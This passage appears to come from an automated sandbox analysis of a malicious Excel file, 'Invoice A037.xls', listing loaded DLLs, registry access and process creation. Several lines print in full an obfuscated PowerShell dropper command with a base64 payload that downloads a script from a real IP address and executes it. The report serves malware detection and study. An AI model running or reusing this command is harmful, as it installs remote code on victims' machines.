            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: dwmapi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: bcrypt.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: rpcrtremote.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: secur32.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: webio.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: nlaapi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: credssp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
            Source: Invoice A037.xlsStatic file information: File size 1072128 > 1048576
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\oojbmfem\oojbmfem.pdb source: powershell.exe, 00000008.00000002.457674292.00000000029D5000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\otto1awr\otto1awr.pdbhP source: powershell.exe, 00000016.00000002.498637562.0000000002673000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\otto1awr\otto1awr.pdb source: powershell.exe, 00000016.00000002.498637562.0000000002673000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\oojbmfem\oojbmfem.pdbhP source: powershell.exe, 00000008.00000002.457674292.00000000030D7000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: .pdbB source: powershell.exe, 00000016.00000002.501343114.000000001AD68000.00000004.00000020.00020000.00000000.sdmp
            Source: Invoice A037.xlsInitial sample: OLE indicators encrypted = True

            Data Obfuscation

            barindex
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))"
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))"
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))"Jump to behavior
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXN